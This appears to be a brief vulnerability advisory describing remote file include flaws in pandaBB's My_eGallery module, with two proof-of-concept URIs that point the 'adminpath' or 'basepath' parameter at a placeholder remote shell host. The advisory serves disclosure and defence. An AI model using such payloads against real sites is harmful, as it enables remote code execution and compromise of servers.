pandaBB Multiple Remote File Include Vulnerabilities

pandaBB Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://sh3ll
http://www.example.com/pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://sh3ll